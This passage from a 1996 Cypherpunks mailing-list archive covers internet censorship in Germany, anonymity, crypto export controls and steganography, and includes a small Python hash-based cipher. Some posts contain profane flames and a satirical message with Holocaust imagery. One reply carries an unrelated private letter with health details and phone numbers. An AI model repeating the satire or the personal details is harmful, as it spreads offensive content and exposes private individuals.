2) Would it better to hide the data in a jpg with black and white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development? If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit. Please email replies to me directly if this is off-topic. Thank you. Makofi From aba at dcs.ex.ac.uk Thu Sep 5 15:34:59 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Fri, 6 Sep 1996 06:34:59 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609042341.QAA14459@eff.org> Message-ID: <199609051650.RAA00376@server.test.net> Stanton McCandlish writes on cpunks: > Adam Back typed: > > > > No. But I too am rather suprised to hear an EFF board member > > apparently speaking against free speech. OK, so maybe she was > > mis-quoted so I wait for her rebuttal, but nope, she basically to my > > reading reiterates nothing but negative opinions on free speech and > > anonymity. > > > > Tim's quotes of her CFP speech further demonstrates her leanings. > > I've talked to her personally about this. She's not thinking along those > lines, she just perceives a potential problem in the > accountability/ethics area, and is wondering how that can be solved, it can't, > if it can be solved, and what the price of such a solution is. the price for removing anonymity is the price of loosing strongly free speech (you know real free speech, as opposed to `free speech' where you can say what you want provided you provide your ID up front to the thought police, just in case at some future date you say something that someone somewhere in some region of the world finds mildly objectionable). 
The draconian measures necessary to even start also involve GAK, outlawing of non-GAKed crypto, placing import restrictions on crypto (I saw Freeh quoted as saying that restricting crypto imports may be necessary recently, something I predicted some years ago) draconian thought police laws, and so on. It's quite simple to envisage: place yourself in the position of the overzealous law enforcement type, imagine you are tasked with elminating encryption, free speech on the internet, anonymity. So what're you going do? First thing you might notice is that pretty near everyone is against you. So you work up a few four horseman scare stories, try to squelch all the first ammendment based challenges in the courts, do a few oblique trade-offs with companies exchanging key escrow for more bits, maybe blow up a few airplanes, and federal buildings and blame it on `militias', and the Internet. Rant about the Internet at each opportunity whether has anything to do with it or not (did the perps even know anyone with internet access, do they have a distant cousin who does, there must be an angle somewhere, or heck who cares, just shout about the Internet anyway, no one'll notice it's nothing to do with it). You realise that you're going to have to get pretty mean to actually stamp out free speech for all these people with a quaint wish to uphold the constitution, and protect their freedoms. Russia just about managed it for a while but they shot about 1 in 10 people in the process, they had licenses to own a photocopier, a typewriter, samples had to be provided to the KGB. > Honest, she's not *advocating* restrictions on anonymity, just > asking if any are necessary, no, they are not > in who's opinion, mine, most cpunks, yours? the rest of the EFF board? > with what rationale, at what cost, and by what mechanism. rationale above: the alternative loss of freedoms is too costly, look at Singapore's example. 
> > Lets put it this way: if Louis Freeh offered to be an EFF board > > member, would you take him on board? If he seemed quite > > Highly unlikely. Who gets to be a boardmember is decided by a board vote. > Freeh's anti-freedom history, and his obnoxious nature would, in my > guesstimate, give him less that a .0000000000001% chance of ever making > it onto the EFF board. And that's being nice. :) > > Dyson has no such history, and does have a history of careful thought > (even if disagreed with by quite a few people) about networks, online > commerce, negative effects of regulation, and civil liberties issues. > More the former 3 than the latter 1. So it seems. If she has little to say on civil liberties, perhaps she should refrain. William Geiger corrected me in this thread, his reading is that Dyson's interview was not a personal interview, she was being interviewd _as_ an EFF board member, she just chose to make a personal statement in it. If this is the case I submit the correct comment on her part would have been that the EFF had no current position on the topic. > > pro-anonymity, and free speech, and later turned out to be having > > doubts, would you keep him? > > I'll generalize that to "if you had any boardmember who expressed doubts > about the value of free speech and privacy, would the board keep them?" > I think not. But Esther's taken no such position. She's asking questions > about the mechanics of a system, and the effects of the system on society. > These are valid questions. It'd be helpful to see some short > Cypherpunks-generated answers, if they are available. Stuff about > reputational systems, etc. Personally I think I'm better at coding, than constructing convincing arguments. But for what it's worth here's a few. I doubt they are news to you, but since you kind of asked: Tim's cyphernomicon isn't short but should be a required reading, IMO. The US constitutional protections for free speech? 
The Singaporean demonstration of the alternative? The principle of having laws against crimes, not against the potential means of comitting crimes. You know, you can't carry a knife, why not? Because you might commit a crime. So why not wait see if you do commit a crime. You could just as easily stab someone with a screw driver, so what now, outlaw carrying of screw drivers, have permits to carry a screw driver? Sad fact is you can probably get successfully prosecuted for carrying a screw driver if you can't demonstrate a need to carry one already. You see where this line of reasoning heads. It is ultimately useless to make it illegal for people to have any means to commit crimes. Crimes with victims are already illegal, we don't need anymore laws, we've got way too many already. If someone goes out and murders someone, the police attempt to catch the murderer to prevent further murders. We don't need dumb laws outlawing cars (so the guy can't drive away from the scene?), knives, guns, the internet (in case he plots to off someone), the phone system in case he uses that, pay phones in case he uses one of those, what comes next, you know? Several things which were proposed in jest by cypherpunks which were thought too outlandish to be next in line for banning, were actually seriously proposed and even implemented. It never ceases to amaze me the things the law enforcement types think up. Perhaps when the technology is up to it we ought to just implant a CCD chip behind newborn's eyeballs, and have a life escrow system to just record ever last second of everyones existance just in case they have the urge to drive over 55, or not divulge their true name, social security number, address etc. in a casual electronic conversation. > Just to be clear: There is no disagreement on the board, or the staff, of > EFF that anonymity is a vital component of privacy. 
yay :-) Now all you need to do is have an official policy that says so, so that board members who are less clear on the subject, can quote that policy rather than discussing their own opinions :-) Guess I've said all that I can on this sub-thread, so I'll leave you to continue with important EFF work, trying to knock down all those son of CDAs the individual states are even now crafting, Adam -- #!/bin/perl -sp0777i Message-ID: <9609051711.AA06484@etna.ai.mit.edu> >as are the Dworkin/MacKinnon-inspired anti-pornography laws which >Canada uses to censor lesbian bookstores and gay magazines. >For the most part, other than sex and drugs, Somewhat ironic that the first material to be banned under the law was by MacKinnon. Meanwhile Dworkin has no credebility at all, in addition to her "anti-porn" crusading activities she has a line writing sado-masochistic erotica. >Mark openly violates the >censorship laws, and his shop occasionally gets raided, and after >the last bust they've decided he's a co-conspirator with everybody >who's grown drugs using seeds or light bulbs bought from him, >and they're playing a FUD game about whether to charge him >with 8 life sentences, in under-5-year pieces....) There are equally bad cases in Texas. Two brothers who ran a hydroponics equipment store got jailed on "conspiracy" charges. There are problems in Canada, no doubt. I was simply pointing out that the Teal case is a bad example. The Zundel case is a much more apprpriate one. Phill From flengyel at dorsai.org Fri Sep 6 01:35:21 1996 From: flengyel at dorsai.org (Florian Lengyel) Date: Fri, 6 Sep 1996 16:35:21 +0800 Subject: up In-Reply-To: Message-ID: <322F0FDC.1682@dorsai.org> Rebecca L Madden wrote: > > it's three o four. > I'm up. > > Becky Madden > #(412)-862-2934 Given the opportunity to construe something the wrong way, I will. I take it this means we should call you now. 
F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel > > //<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\ > > I believe that imagination is stronger than knowledge- > That myth is more potent than history. > I believe that dreams are more powerful than facts- > That hope always triumphs over experience- > That laughter is the only cure for grief. > And I believe that love is stronger than death. > > -Robert Fulghum From grafolog at netcom.com Fri Sep 6 01:43:53 1996 From: grafolog at netcom.com (jonathon) Date: Fri, 6 Sep 1996 16:43:53 +0800 Subject: Race Bit: C In-Reply-To: <199609050630.AAA07395@zifi.genetics.utah.edu> Message-ID: On Thu, 5 Sep 1996, Anonymous wrote: > defunded 100%, IMO). Violence begats violence which begats even larger > government, don't start us on that road -- leave me in peace. If I understand you correctly, it is OK for a government to institute violence against the residents of the land it claims dominion over, but it is not acceptable for the inhabitants of that piece of land to respond in self defence. xan jonathon grafolog at netcom.com However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart From nobody at replay.com Fri Sep 6 02:08:18 1996 From: nobody at replay.com (Anonymous) Date: Fri, 6 Sep 1996 17:08:18 +0800 Subject: Tack of Internet censorship Message-ID: <199609051526.RAA18328@basement.replay.com> Six months ago, the Internet censors and Exon wannabees took the tack of "the Internet is too hard to censor". Now, their motto is "There will be some who get around our censorship, but we will try anyway." 
Unfortunately, I believe these censorship strikes will keep happening unless we find a way to stalemate them. What I am proposing is that Apache or other WWW servers have a way to allow access to site B's URL at site A, similar to the old trick of finger user at sitea.com@siteb.com. Implementation should be simple. However, I wonder what is a good standard way to specify this in the URL or a site. From schmidt at pin.de Fri Sep 6 02:26:31 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 17:26:31 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <322EA63D.35B5@stadt.com> Message-ID: > No problem in gaining access so far. I even traces through Telekom and > C-Serve - no trace of restrictions. > > Maybe just a way to generate traffic to a lame site? > Definetly not. There is an advisory from the Generalbundesanwaltschaft and the ICTF that ISPs should ('have to') restrict the access to those urls. But so far nothing happend. I asked some people to try the urls and there where no restrictions. (I encounterd no restrictions myself.) -stephan From Kevin.L.Prigge-2 at tc.umn.edu Fri Sep 6 02:37:01 1996 From: Kevin.L.Prigge-2 at tc.umn.edu (Kevin L Prigge) Date: Fri, 6 Sep 1996 17:37:01 +0800 Subject: Anonymity (re: the Esther Dyson issue) In-Reply-To: <9609042054.AB16740@anchor.ho.att.com> Message-ID: <322eea225b5e002@noc.tc.umn.edu> stewarts at IX.NETCOM.COM said: > In Tim's Cyphernomicon, he says > - I have heard (no cites) that "going masked for the purpose > of going masked" is illegal in many jurisdictions. Hard to > believe, as many other disguises are just as effective and > are presumably not outlawed (wigs, mustaches, makeup, > etc.). I assume the law has to do with people wearning ski > masks and such in "inappropriate" places. Bad law, if real. > > A lot of the motivation was to stop the Ku Klux Klan terrorism. 
> On the other hand, the reason it was mentioned on the list a couple > years ago was that a woman was arrested in some North Central city, > probably Detroit, for violating it, because she was wearing a > Middle-Eastern-style chador outfit that covered her face. > That would be St Paul, MN. If I recall, the arrest was thrown out (and possibly the law overturned). I can look for references if anyone cares. -- Kevin L. Prigge | "I rarely saw people sitting at Systems Software Programmer | computers producing real code Internet Enterprise - OIT | wearing ties." - Philippe Kahn University of Minnesota | (speech at Software Development '90) From paul at fatmans.demon.co.uk Fri Sep 6 02:39:22 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 17:39:22 +0800 Subject: their is a new mailing list Message-ID: <841932721.22517.0@fatmans.demon.co.uk> Some crazy fucker wrote: > > their is a new mailing list for all you hackers just email your name or > > handle and e-mail address and youll be subscribed > > send information to hack5 at juno.com Listen motherfucker. I`m going to say this once and for all... this list is not about hacking, not about "me too" messages, it is about cryptography, the tecnical and ethical sides. if you want to post shit like this do it on alt.2600 and let me tell you they will flame you for it there too, and quite rightly, I think I speak for us all when I say RTFM. 
Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From declan at eff.org Fri Sep 6 02:55:21 1996
From: declan at eff.org (Declan McCullagh)
Date: Fri, 6 Sep 1996 17:55:21 +0800
Subject: FWD: Another try to kill democracy
In-Reply-To: <322EA63D.35B5@stadt.com>
Message-ID:

That was my first thought, but it appears the ban is being implemented, albeit slowly. Check out my message of about 12 hours ago on the topic.

-Declan

On Thu, 5 Sep 1996, D. Moeller wrote:
> James A. Donald wrote:
> >
> > At 09:53 PM 9/2/96 +0000, SPG wrote:
> > > I just got wind that the German government is planning to force german
> > > ISP's to shut off access to my ISP, XS4ALL, because the german magazine
> > >'Radikal' has a web page on xs4all.
> > <..>
> > > How serious is this threat?
>
> No problem in gaining access so far. I even traces through Telekom and
> C-Serve - no trace of restrictions.
>
> Maybe just a way to generate traffic to a lame site?
>
> Cheers Moe!
> --
>
> D. Moeller at WebLab U-Agency GmbH
> webadmin at stadt.com http://www.stadt.com/u-agency/
> moe-san at elcafe.com http://www.elcafe.com/~moe-san/
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From paul at fatmans.demon.co.uk Fri Sep 6 02:57:44 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Fri, 6 Sep 1996 17:57:44 +0800
Subject: Voting Monarchist?
Message-ID: <841932727.22534.0@fatmans.demon.co.uk>

> ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running
> ! for president.
Anyone who doesn't advocate killing all kings, presidents,
> ! and prime ministers is a fucking statist and should be beaten to a pulp
> ! with a rattan stick.

Yeah, and anyone who doesn't advocate random street searches, public floggings and legislation to make the eating of asparagus for breakfast law is a raving leftist militant cyberterrorist neon lighting, macdonalds working, fudge packing, bad ass dude with an attitude...

have a nice day motherfucker

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From makof at alias.cyberpass.net Fri Sep 6 03:22:36 1996
From: makof at alias.cyberpass.net (makofi)
Date: Fri, 6 Sep 1996 18:22:36 +0800
Subject: Steganography -- Tell-tale signs?
Message-ID: <199609051651.JAA06856@sirius.infonex.com>

Hi there!

I'd appreciate some help from you experts in steganography.

1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they?

2) Would it be better to hide the data in a jpg with black and white image rather than a color one?

3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none, are there tools in development?

If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit. Please email replies to me directly if this is off-topic.

Thank you.
Makofi From frantz at netcom.com Fri Sep 6 03:46:49 1996 From: frantz at netcom.com (Bill Frantz) Date: Fri, 6 Sep 1996 18:46:49 +0800 Subject: rc2 export limits.. Message-ID: <199609060629.XAA27790@netcom6.netcom.com> At 9:23 AM 9/5/96 -0400, P. J. Ponder wrote: >The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in >the fine print at the beginning that SHA is export controlled. I don't >have the document to refer to right now, but it plainly states that SHA >falls under ITAR. As a cryptographic hash function, why would it be >controlled in this way? > >How can I use SHA to encrypt something for someone else to decrypt? I >know how to use it for authentication; am I missing something here? Any secure hash can be used as a stream cypher. Concatenate your key and a block serial number (never to be reused) to get a number to exclusive or with the plain text. When you need a new block, use the next sequential serial number. (See Applied Cryptography) Raw SHA probably isn't exportable because people can use it for crypto. If your use of SHA was bundled into a OS password scheme, you could probably get a CJ on it and export it. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From schmidt at pin.de Fri Sep 6 03:52:31 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 18:52:31 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: <322E94B9.41C67EA6@systemics.com> Message-ID: > I wonder how they are doing this? We know that the Germans allow full There is an advisory around where the ISPs say that they think it's not possible to block urls. And even if they figure a way out to do this, this mailing list proves (mirrors) that it's not possible to stop the flow of information. 
But the German Government doesn't seem to even understand a bit how the inet works. > this would increase the size of the blacklist that the Germans must use, The Germans. I don't like this evil German bashing. (which is quite obvios in some mails, although I think not in this one, but I had to say this) Some of us (some may say most, I'm not) are quite normal and there are even some cypherpunks around :) And as there are lots of ISPs in Germany (as in every other country) they won't get everyone to resctrict the access to some pages. -stephan From perry at piermont.com Fri Sep 6 03:59:18 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 6 Sep 1996 18:59:18 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: <199609051547.LAA07458@jekyll.piermont.com> "P. J. Ponder" writes: > The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in > the fine print at the beginning that SHA is export controlled. I don't > have the document to refer to right now, but it plainly states that SHA > falls under ITAR. As a cryptographic hash function, why would it be > controlled in this way? Because the feds aren't stupid -- they know you can use any good hash algorithm as the core for a block cipher. Perry From jimbell at pacifier.com Fri Sep 6 04:01:27 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 6 Sep 1996 19:01:27 +0800 Subject: Herr Schmidt Message-ID: <199609052021.NAA29277@mail.pacifier.com> At 10:07 AM 9/5/96 -0700, Timothy C. May wrote: >By the way, I used the name "Schmidt" in my satire post, sent out earlier >this morning. I picked that name randomly, being a common German name >(cognate to Smith, I believe), and meant nothing with regard to Stephan. > >(I also don't dislike Germans in general. I studied some German in high >school--don't ask me to use it, though!--and have visited Germany. They >just have a certain well-known tendency to take the authoritarian path at >times.) 
>--Tim "Once all the Germans were warlike and mean But that couldn't happen again. We taught them a lesson in 1918... And they've hardly bothered us since then!" Tom Lehrer, "MLF Lullaby" Jim Bell jimbell at pacifier.com From andrew_loewenstern at il.us.swissbank.com Fri Sep 6 04:01:36 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 6 Sep 1996 19:01:36 +0800 Subject: Message Digest Ciphers (was Re: rc2 export limits..) In-Reply-To: Message-ID: <9609051609.AA00717@ch1d157nwk> P J Ponder writes: > How can I use SHA to encrypt something for someone else to > decrypt? I know how to use it for authentication; am I missing > something here? Check Applied Cryptography for info on ciphers such as "Karn", "Luby-Rackoff", and "MDC" ... These are encryption algorithms that use one-way hashes as their block functions. Attached is a version of the Karn cipher I implemented as an export-a-crypt-system .sig a while back... I used python because it's my favorite language and has MD5 built-in. I implemented the Karn cipher since it was the simplest (and therefore shortest) of the MD ciphers, not because it's the most secure. 
andrew

#!/usr/local/bin/python -- -export-a-crypt-system MD5 CBC-mode Karn Cipher
from md5 import *;from sys import *;from string import *;M=md5;il=ir=M(argv[3]\
).digest();ki=M(argv[2]).digest();K,k=ki[:8],ki[8:];p=stdin.read(32);c={'-e':'\
l=x(l,il);r=x(r,ir);R=x(M(l+K).digest(),r);L=x(M(R+k).digest(),l);il=L;ir=R','\
-d':'L=x(M(r+k).digest(),l);R=x(M(L+K).digest(),r);L=x(L,il);R=x(R,ir);ir=r;il\
=l'};main="def x(a,b):return joinfields(map(lambda m,n:chr(m^n),map(lambda m:o\
rd(m),a),map(lambda m:ord(m),b)),'');\nwhile(p):p=ljust(p,32);l,r=p[:16],p[16:\
];exec(c[argv[1]]);stdout.write(L+R);p=stdin.read(32)";exec(main)
#try: echo 'TESTING 1 2 3' | karn -e 'key' 'I-V' | karn -d 'key' 'I-V'

From adam at homeport.org Fri Sep 6 04:04:22 1996
From: adam at homeport.org (Adam Shostack)
Date: Fri, 6 Sep 1996 19:04:22 +0800
Subject: GAK by TIS
In-Reply-To: <199608302326.XAA02261@pipe2.t1.usa.pipeline.com>
Message-ID: <199609060148.UAA03173@homeport.org>

To the editor,

It's important to note that the Clinton administration has not vowed to end export restrictions on key escrowed products. The administration has agreed to let out relatively weak 64 bit products, if they are escrowed. This is far below the minimum key length of 80 bits recommended by Schneier, Rivest, Blaze, et al. (To be fair, this is noted deep inside the article.)

The Clinton administration seems to expect overseas business to buy software with the spying functions built in and publicized. It is more likely that US software companies will continue to suffer until such time as the administration realizes that strong crypto is not only not going to disappear, but flourish as it enables online commerce.

Adam Shostack

| Network World, August 26, 1996, Page 1
| Key-escrow firewall ready to leave the country
|
| by Ellen Messner, Washington D.C.
|
|
| After months of talk about exporting encryption software,
| there will finally be action.
| | Fulfilling the Clinton Administration's vow to end export | restrictions on strong encryption products if they use | key-escrow features, the U.S. government this week is | expected to permit Trusted Information Systems, Inc. | (TIS) to sell its Data Encryption Standard (DES)-equipped | Gauntlet firewall overseas. From amnesia at chardos.connix.com Fri Sep 6 04:05:21 1996 From: amnesia at chardos.connix.com (Anonymous) Date: Fri, 6 Sep 1996 19:05:21 +0800 Subject: No Subject Message-ID: <199609052210.SAA11602@chardos.connix.com> On 5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote: > For them, I would go to jail; for you, I would even cooperate > with the BATF (which should be defunded 100%, IMO). Why would you go to jail? Who made jails? Who would use violence to bring you in? jfa From whgiii at amaranth.com Fri Sep 6 04:05:29 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Fri, 6 Sep 1996 19:05:29 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <199609051915.OAA03527@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- HI FOUND THE NOTICE ABOUT IMMIGRATION AND NATURALIZATION SERVICE (INS) JOBS! THEY ARE RECRUITING FOR APPROXIMATELY 1500 ADMINISTRATIVE AND SUPPORT STAFF TO BE HIRED AND ON-BOARD BY SEPTEMBER 30, 96. 
TYPES OF POSITIONS: IMMIGRATION INFORMATION OFFICERS ADMINISTRATIVE AND SUPPORT STAFF DEPORTATION CLERK INVESTIGATIVE ASSISTANTS IMMIGRATION STATUS VERIFIER IMMIGRATION RECORDS TECHNICIAN APPLICATION CLERKS MOTOR VEHICLE OPERATOR AUTOMOTIVE MECHANICS FENCE REPAIRMAN LAW ENFORCEMENT COMMUNICATIONS ASSISTANT ELECTRONICS TECHNICIAN HEADQUARTERS PERSONNEL VACANCY HOTLINE: (202) 514-4711 (VIRGINIA, WASHINGTON DC) ADMINSTRATIVE CENTER, BURLINTON, VT: (902) 660-1116 (CT, DE, ME, MD, MA, NJ, NY, PA, PUERTO RICO, VT, WV) ADMINISTRATIVE CENTER, DALLAS, TX: (214) 767-5884 (AL, AR, FL, GA, KY, LA, MS, NM, NC, OK, SC, TN, TX) ADMINISTRATIVE CENTER, TWIN CITIES, MN: (612) 725-3897 RECORDING (612) 725-3880 (CO, DENVER, ID, IL, IO, KS, MI, MN, MO, MT,NE, ND, OH, SD, UT, WI, WY) ADMINISTRATIVE CENTER, LAGUNA NIGUEL, CA: (714) 360-3058 (AL, AR, CA, HI, GUAM, NE, OR, WA) SORRY IT TOOK SO LONG TO FIND. THIS WAS ON OUR OCPM EASTERN REGION BBS MESSAGE 07-17-96, FROM JACKIE MCLEER, SUBJECT: DEPARTMENT OF JUSTICE RECRUITMENT. I GUESS YOU HAVE HEARD BY NOW THAT PLANS FOR REGIONIZATION HAS BEEN PUT ON HOLD DO TO LACK OF MONEY. THEY SAY WE WON'T BE GOING ANY WHERE OR DOING ANY THING UNTIL AT LEAST 1999. THERE IS TALK OF A RIF HERE! 50 PEOPLE THIS YEAR (97) AND 50 THE NEXT TWO YEARS(98 & 99). WE HAVE TO BE DOWN TO 160 BY THE YEAR 2000. I THINK MY JOB IS SAFE, THEY CAN'T GET THE WORK DONE NOW WITH 12 PERSONNEL ACTIONS CLERK I CAN'T SEE THEM DOING IT WITH LESS. DID YOU HAVE A NICE HOLIDAY? DO ANYTHING SPECIAL? WE HAD RAIN ALL FOUR DAYS - (I HAD TAKEN OFF FRIDAY) - BUT IT WAS GREAT JUST NOT BEING AT WORK! I HAD BILL'S BIRTHDAY PRESENT DELIVERED EARLY (SEPT 18 IS HIS B'DAY). I GOT HIM A TV HE COULD SEE WITHOUT SITTING ON TOP OF -- RCA 52 INCH PROSCAN. IT'S GREAT AND HE SEEMS TO REALLY LOVE IT. I DON'T WATCH ENOUGH TO MATTER, BUT IT IS NICE FOR MOVIES. SHELLY AND HER DAUGHTER LESLIE CAME OVER FRIDAY EVENING TO HAVE PIZZA AND WATCH A MOVIE. THEY LIKED IT TOO! HOPE THINGS ARE GOING BETTER THERE. 
MY JOB IS GOING OK FOR NOW BUT A LOT OF THIS IS MEDICATION. MY DOCTOR PUT ME ON SOMETHING AGAIN WHEN I SAW HIM LAST MONTH. BLOOD PRESSURE WAY UP AND STARTING TO FEEL LIKE I WOULD CRY ANY MINUTE OVER ANYTHING! I SEE HIM AGAIN SEPT 13 MAYBE HE'LL TELL ME EVERYTHINGS OK (HA!:) THATS ALL FOR NOW - ITS SOMEWHERE AROUND 4 AM AND I HAVE TO GET READY FOR WORK. HI TO HOLLY! LOVE YA! KATHY In , on 09/05/96 at 01:23 PM, Asgaard said: >On Wed, 4 Sep 1996, Declan McCullagh wrote: >> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's >> office) has "advised" the Internet providers to block access to >> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication >> from the radical left that is illegal in Germany, but not in >> the Netherlands. >This is amazing. Without defending the German stand on the Revisionist >crap, that part is at least understandable in a historical context >(their sense of guilt for the unfortunate developments in the 30's >and 40's etc). But a quick overview of the contents of Radikal gives the >impression of an ordinary leftist zine, defining the outlawing of it as >pure political censorship in a Western 'democracy'. I'm truly surprised. >Asgaard Is there an URL with a English version? I am always curious to see what governments think they should "protect" their citizens from. Thanks, - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. 
Finger whgiii at amaranth.com for PGP Key and other info
- -----------------------------------------------------------

From pjn at nworks.com Fri Sep 6 04:10:22 1996
From: pjn at nworks.com (pjn at nworks.com)
Date: Fri, 6 Sep 1996 19:10:22 +0800
Subject:
Message-ID:

In> what do you know about hackers

More than you apparently...

P.J.
pjn at nworks.com

... Nothing is opened more often by mistake than YOUR mouth.
___ Blue Wave/QWK v2.20 [NR]

From makof at alias.cyberpass.net Fri Sep 6 04:12:50 1996
From: makof at alias.cyberpass.net (makofi)
Date: Fri, 6 Sep 1996 19:12:50 +0800
Subject: Steganography -- Tell-tale signs?
Message-ID: <199609051650.JAA06725@sirius.infonex.com>

Hi there!

I'd appreciate some help from you experts in steganography.

1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they?

2) Would it be better to hide the data in a jpg with black and white image rather than a color one?

3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development?

If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit.

Please email replies to me directly if this is off-topic.

Thank you.

Makofi

From wclerke at emirates.net.ae Fri Sep 6 04:15:29 1996
From: wclerke at emirates.net.ae (Wayne Clerke)
Date: Fri, 6 Sep 1996 19:15:29 +0800
Subject: Using Compromised Remailers to Get the Goods
Message-ID: <199609052137.BAA04432@ns2.emirates.net.ae>

> From: Timothy C. May
> To: cypherpunks at toad.com
> Subject: Using Compromised Remailers to Get the Goods
> Date: Thursday, 5 September 1996 8:28

< ... >

> (For example, full sender untraceability means that sources within police
> departments can go home, log on with the own PCs, and sell information
> about pending investigations, modulo their concerns about pointing to
> themselves with information provided (see "canary traps").

Heh ... is this a 'whistle-SUCKER'? :-)

>
> --Tim May
>

EMail: wclerke at emirates.net.ae
PGP key ID: AEB2546D FP: D663D11E DA19D74F 5032DC7E E001B702
PGP mail welcome.
Voice: +971 506 43 48 53
Wayne Clerke
If you're not living on the edge, you're taking up too much space.

From tcmay at got.net Fri Sep 6 04:15:48 1996
From: tcmay at got.net (Timothy C. May)
Date: Fri, 6 Sep 1996 19:15:48 +0800
Subject: ... subversive leftists
Message-ID:

At 11:23 AM 9/5/96, Asgaard wrote:
>On Wed, 4 Sep 1996, Declan McCullagh wrote:
>
>> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
>> office) has "advised" the Internet providers to block access to
>
>> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication
>> from the radical left that is illegal in Germany, but not in
>> the Netherlands.
>
>This is amazing. Without defending the German stand on the Revisionist
>crap, that part is at least understandable in a historical context
>(their sense of guilt for the unfortunate developments in the 30's
>and 40's etc). But a quick overview of the contents of Radikal gives the
>impression of an ordinary leftist zine, defining the outlawing of it as
>pure political censorship in a Western 'democracy'. I'm truly surprised.

Leftists are despicable. They steal our money, they corrupt our politics, they nationalized our industries, they subvert our ideals, and they undermine our national will.

The Democratic People's German Reich is fully justified in cutting off contacts with subversive radical publications in Jew-dominated nations like Holland.
As Reichskommander Schmidt points out: "The citizen-units who access foreign Web sites will be rounded up and disposed of like the vermin they are. We cannot allow the Revisionists and Leftists to triumph. We will send them to the showers."

Heil Freeh!

--Klaus

From nobody at zifi.genetics.utah.edu Fri Sep 6 04:20:26 1996
From: nobody at zifi.genetics.utah.edu (Anonymous)
Date: Fri, 6 Sep 1996 19:20:26 +0800
Subject: Subject: Re: Race Bit: C
Message-ID: <199609052031.OAA10096@zifi.genetics.utah.edu>

No need to send to :Anonymous

But since you did

>Cc: cypherpunks at toad.com

saying ...

> If I understand you correctly, it is OK for a government to
> institute violence against the residents of the land it claims
> dominion over, but it is not acceptable for the inhabitants of
> that piece of land to respond in self defence.

I will say this: No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK, and AsPol initiation of violence is not either. This can lead into a long argument about just _when_ violence is initiated, where opinion is more important than fact, but IMO: Randy Weaver was not initiating violence. David Keresh was not initiating violence. Pot growers and smokers are not initiating violence. But Mr. Bell, if he follows through on his scheme, *will* be initiating violence. His scheme, while it can sound tempting (especially every April 15th!) has no guarantee that it will _only_ be used against the Lon Horiuchis of our government, in fact, it may be said it is not guaranteed to not be used against Mr. Bell himself, as many have joked.

There are two roads to take in life, convincing and coercing others. I think that the former is still possible, Mr. Bell and many others disagree. I worry that abuse of the very young and weak (for now) anonymity system for the purpose of initiating, rather than exposing, violence will lead to more government violence than we already have.
Perhaps I am wrong and there is no hope; but if so, that means another revolution. Revolutions are very romantic sounding, to those who have not been in a war. I urge everyone to read "Emancipating Slaves, Enslaving Free Men" by Jeffrey Rogers Hummel for a look at what our last revolution got us (hint: it was *not* less government). I believe the book is available from Laissez Faire books. It is quite good, and refreshingly truthful when compared to the gobbledygook that most history teachers try to force down students' throats.

From jya at pipeline.com Fri Sep 6 04:23:20 1996
From: jya at pipeline.com (John Young)
Date: Fri, 6 Sep 1996 19:23:20 +0800
Subject: Metcalf and Other Net.Fogies
Message-ID: <199609052028.UAA12733@pipe2.t1.usa.pipeline.com>

On Sep 05, 1996 10:27:34, 'tcmay at got.net (Timothy C. May)' wrote:

